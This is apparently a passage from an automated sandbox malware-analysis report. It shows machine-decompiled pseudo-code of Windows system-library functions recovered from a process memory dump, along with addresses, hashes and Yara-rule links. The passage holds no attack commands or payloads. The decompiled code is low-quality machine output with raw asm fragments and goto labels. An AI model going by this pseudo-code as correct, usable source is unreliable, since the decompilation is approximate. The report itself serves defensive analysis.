					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00FE95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00FA9325();
					_t50 =  *0x10984c4; // 0x0
					return E00FFD0D1(L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x00fa9240
0x00fa9242
0x00fa9247
0x00fa924c
0x00fa924e
0x00fa9255
0x00fa9257
0x00fa925a
0x00fa925f
0x00fa925f
0x00fa9266
0x00fa9271
0x00fa9276
0x00fa9279
0x00fa927e
0x00fa9295
0x00fa929a
0x00fa92b1
0x00fa92b6
0x00fa92d7
0x00fa92dc
0x00fa92e0
0x00fa92e6
0x00fa92e8
0x00fa92ee
0x00fa9332
0x00fa9333
0x00fa9337
0x00fa9338
0x00fa933a
0x00fa933a
0x00fa933d
0x00fa9342
0x00fa9342
0x00fa9345
0x00fa9349
0x00fa934e
0x00fa9352
0x00fa9357
0x00fa92f4
0x00fa92f4
0x00fa92f6
0x00fa92f9
0x00fa9300
0x00fa9306
0x00fa9324
0x00fa9324

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e780bc087ef6ae1c56279611ad4fddadbdd7bec17f7ea81fe8f86241c8a4c3b
Instruction ID: 7c0abdd402174e5309b5bfddaf3e272cadc63f112f87b1379a479b3e819cb622
Opcode Fuzzy Hash: 1e780bc087ef6ae1c56279611ad4fddadbdd7bec17f7ea81fe8f86241c8a4c3b
Instruction Fuzzy Hash: F3214572045645EFC722EF28CE02F5AB7F9FF09704F04456DA189866A2CB79E941EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FDB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00FC2280(_t12, 0x1098608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00FE00C2(0x1098608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x00fdb395
0x00fdb3a2
0x00fdb3a5
0x00fdb3aa
0x00fdb3b2
0x00fdb3ba
0x00fdb3bd
0x00fdb3c0
0x00fdb3c4
0x00fdb3c9
0x0101a3e9
0x0101a3ed
0x0101a3f0
0x0101a3ff
0x0101a403
0x0101a409
0x00000000
0x00000000
0x0101a40b
0x0101a40b
0x0101a40f
0x0101a415
0x0101a423
0x0101a423
0x0101a415
0x00fdb3d1
0x00fdb3e8
0x00fdb3e8
0x00fdb3d9

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97756a1d0b4c0ca69014f012ff955622e2259ae3e0c1d2ff984c7e5e9fb3fba2
Instruction ID: aa268c88eaa794dc479491392af60d462ba34f8b18280157c0c8afcb5120e159
Opcode Fuzzy Hash: 97756a1d0b4c0ca69014f012ff955622e2259ae3e0c1d2ff984c7e5e9fb3fba2
Instruction Fuzzy Hash: 92110C33706114DBCB199E558D81B6B7257EBC5730B29412EE956CB380DE355C01E6D4

Uniqueness

Uniqueness Score: -1.00%

Function 01034257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01034257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x10808d0);
				E00FFD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E010341E8(__ebx, __edi, __ecx, _t39);
				E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x10987e4;
					_t18 =  *0x10987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1095cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x10987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x10987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00FA7055(_t31 + 0xfffffff8);
								_t24 =  *0x10987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x10987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1095cd0;
				if( *0x1095cd0 <= 0) {
					L00FA7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x10987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x10987e8 = _t30;
						 *0x10987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00FFD0D1(L01034320());
			}

0x01034257
0x01034257
0x01034257
0x01034259
0x0103425e
0x01034263
0x01034265
0x01034273
0x01034278
0x0103427c
0x0103427f
0x01034281
0x01034287
0x010342d7
0x010342d7
0x010342da
0x0103428d
0x0103428d
0x0103428f
0x01034292
0x01034297
0x0103429c
0x010342a0
0x010342a6
0x010342a8
0x010342ae
0x010342b3
0x00000000
0x010342ba
0x010342ba
0x010342bf
0x010342c5
0x010342ca
0x010342cf
0x010342d0
0x00000000
0x010342d0
0x010342b3
0x00000000
0x010342a6
0x0103429c
0x010342dc
0x010342dc
0x010342e3
0x01034309
0x010342e5
0x010342e5
0x010342e8
0x010342ee
0x010342f0
0x00000000
0x010342f2
0x010342f2
0x010342f4
0x010342f7
0x010342f9
0x01034300
0x01034300
0x010342f0
0x0103430e
0x0103431f

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c7c9b7ac103dc030c358e7e8c1f272ed33b60bd62890cf52a52648026f72d7
Instruction ID: 0db5485aa6f3d5c1f9279bdbf8e9b227e547ad0da8f22de6663d7e7c3a42b88d
Opcode Fuzzy Hash: 91c7c9b7ac103dc030c358e7e8c1f272ed33b60bd62890cf52a52648026f72d7
Instruction Fuzzy Hash: CE215870901A09CFC765DF28D410A58BBF9FB86314B50C2AAD199DF3AADB3AD491CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00FD2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x109848c != 0) {
					L00FCFAD0(0x1098610);
					if( *0x109848c == 0) {
						E00FCFA00(0x1098610, _t19, _t27, 0x1098610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00FD2581(0x1098610, 0xf850a0, _t26, _t27, _t28);
						E00FCFA00(0x1098610, 0xf850a0, _t27, 0x1098610);
					}
				} else {
					L1:
					_t11 =  *0x1098614; // 0x0
					if(_t11 == 0) {
						_t11 = E00FE4886(0xf81088, 1, 0x1098614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00FD2581(0x1098610, (_t11 << 4) + 0xf85070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x00fd23b0
0x00fd23b6
0x00fd2409
0x00fd2415
0x01015ae9
0x00000000
0x00fd241b
0x00fd241b
0x00fd241d
0x00fd2427
0x00fd242e
0x00fd2430
0x00fd2430
0x00fd23b8
0x00fd23b8
0x00fd23b8
0x00fd23bf
0x00fd23fc
0x00fd23fc
0x00fd23c1
0x00fd23c3
0x00fd23d0
0x00fd23d8
0x00fd23d8
0x00fd23dc
0x00fd23de
0x00fd23e1
0x00fd23e1
0x00fd23ec

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d4581edb6ceebef273355f06d150312a02be4e1c9118b23ad851a0a2069e42
Instruction ID: a1f1aa31d8fb0a1ad8fb7a1a668df4800e1861fca89d5ea8c0483a24019f1740
Opcode Fuzzy Hash: 24d4581edb6ceebef273355f06d150312a02be4e1c9118b23ad851a0a2069e42
Instruction Fuzzy Hash: B1116B3274430167D770A62AAC52F15F2CAFBA1720F1C802BF6469B342C97DE800B7D4

Uniqueness

Uniqueness Score: -1.00%

Function 010246A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00FEF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00FDD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00FC77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x010246b7
0x010246ba
0x010246c5
0x010246c8
0x010246d0
0x010246d4
0x010246e6
0x010246e9
0x010246f4
0x010246ff
0x01024705
0x01024706
0x0102470c
0x01024713
0x0102471b
0x01024723
0x01024725
0x010246d6
0x010246d9
0x010246db
0x010246db
0x01024732

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: fcd339b688b1169605f505156dec24d7f4d1c5b686619e5a92544451a766e517
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 92110272504208BBC7119F6C9881DBEB7B9EF85300F1080AEF984CB351DA358D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00FAC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x109d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00FBEEF0(0x10970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0102F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00FBEB70(_t29, 0x10970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00FEB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0102F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x10970c0; // 0x0
					while(_t38 != 0x10970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x109b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x00fac96a
0x00fac974
0x00fac988
0x00fac98a
0x01017c9d
0x01017c9f
0x01017ca4
0x01017cae
0x01017cf0
0x01017cf5
0x01017cfa
0x00fac992
0x00fac996
0x00fac997
0x00fac998
0x00fac9a3
0x00fac9a3
0x01017cb0
0x01017cb7
0x01017cbb
0x00000000
0x00000000
0x01017cbd
0x01017ce8
0x01017cc5
0x01017cc8
0x01017cca
0x01017cd0
0x01017cd6
0x01017cde
0x01017ce4
0x01017ce4
0x01017cd0
0x00000000
0x01017ce8
0x00fac990
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8b722402bbddefd5e108b6cc99439932b504ad5aefaebcca47b5342f514883
Instruction ID: eb091cf286470c1cdfb2448077c4d09dfd0026dba40fa6fd8f595ada31aabb04
Opcode Fuzzy Hash: 3a8b722402bbddefd5e108b6cc99439932b504ad5aefaebcca47b5342f514883
Instruction Fuzzy Hash: 1B11E53231070A9BCB61AF2DDC55A6B7BE5FB84610B10052CF9C587655DF29EC10DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FE37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00FC2280(_t6, 0x1098550);
				}
				_t29 = E00FE387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00FBFFB0(0x1098550, _t27, 0x1098550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x00fe37fa
0x00fe37fc
0x00fe3805
0x00fe3808
0x00fe3808
0x00fe3814
0x00fe3818
0x00fe3846
0x00fe3848
0x00fe384b
0x00fe384b
0x00fe3852
0x00000000
0x00fe3854
0x00fe3856
0x00000000
0x00000000
0x00fe3863
0x00000000
0x00fe3863
0x00fe381a
0x00fe381a
0x00fe381f
0x00fe386e
0x00fe386e
0x00fe3871
0x00fe3873
0x00fe3873
0x00fe3868
0x00000000
0x00fe3868
0x00fe3821
0x00fe3826
0x00000000
0x00000000
0x00fe3828
0x00fe382a
0x00fe3841
0x00000000
0x00fe3841

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450e9efc6c0d75949df5982b27ea087bd26cf75ac3d604378108cc6ca0f6df4f
Instruction ID: f2dfa9ca9452b8c08822e7231cf9e3431306455ccde2e10a0b6bcef132cfb6ea
Opcode Fuzzy Hash: 450e9efc6c0d75949df5982b27ea087bd26cf75ac3d604378108cc6ca0f6df4f
Instruction Fuzzy Hash: ED010473D426A09BC3378A1B994CE26BBA6DFC2B60716406DF8458B201CB34DF00EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FD002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00FC7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00FC7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E00FC7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00FC7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x00fd0032
0x00fd0037
0x00fd0043
0x01014b3a
0x00fd0049
0x00fd0049
0x00fd0049
0x00fd004e
0x00fd0053
0x01014b48
0x01014b5a
0x01014b4a
0x01014b53
0x01014b53
0x01014b5f
0x00000000
0x01014b61
0x00000000
0x01014b61
0x00fd0059
0x00fd0059
0x00fd0060
0x01014b6f
0x01014b6f
0x00fd0069
0x01014b83
0x00000000
0x00000000
0x01014b90
0x01014b9b
0x01014b9b
0x01014ba4
0x00000000
0x00000000
0x01014baa
0x00000000
0x00fd006f
0x00fd006f
0x00000000
0x00fd006f
0x00fd0069

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5296c12135d70510405412f323d2ec9a72fcb86e3371d0a52bcddde82212c325
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: D2110472A056819FD7639B28CA89B3537E5BF40754F1D00E1ED46CB7A3DB2CC841E660

Uniqueness

Uniqueness Score: -1.00%

Function 00FB766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FB766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00FDF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00FDF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00FC4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x00fb7672
0x00fb767f
0x00fb7689
0x00fb76de
0x00fb76de
0x00fb768b
0x00fb7691
0x00fb7693
0x00fb7697
0x00000000
0x00fb7699
0x00fb76a8
0x00000000
0x00fb76aa
0x00fb76ad
0x00fb76b1
0x00000000
0x00fb76b3
0x00fb76b3
0x00fb76b5
0x00fb76ba
0x00fb76bc
0x00fb76bc
0x00fb76c0
0x00000000
0x00fb76c2
0x00fb76ce
0x00fb76ce
0x00fb76c0
0x00fb76b1
0x00fb76a8
0x00fb7697
0x00fb76d9

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: e6ea189d10bb6794e89d92177157e9c667f851a466bf0e3d797f7ed462823205
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: DC018832704619AFC720AE5FCD51E9B77AEEBC4760B250534B909CB254DA70DD01ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00FA9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x10985ec;
				E00FC2280(_t48, 0x10985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00FBFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x109538c; // 0x77f06828
					if( *_t84 != 0x1095388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x107f6e8);
						E00FFD0E8(0x10985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E010788F5(_t80, _t85, 0x1095388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x10986c0; // 0xb407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x10986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00FC2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E010788F5(0x10985ec, _t85, 0x1095388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00FEAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x109b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x10984c0;
																			if(_t82 >=  *0x10984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01079063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00FA922A(_t99);
										_t64 = E00FC7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01078B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x10986c0; // 0xb407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x10986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x10986bc;
													_t87 = 0x10986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00FA9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x10986c4;
												_t87 = 0x10986c0;
												L27:
												E00FD9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00FFD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1095388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x109538c = _t51;
						goto L6;
					}
				}
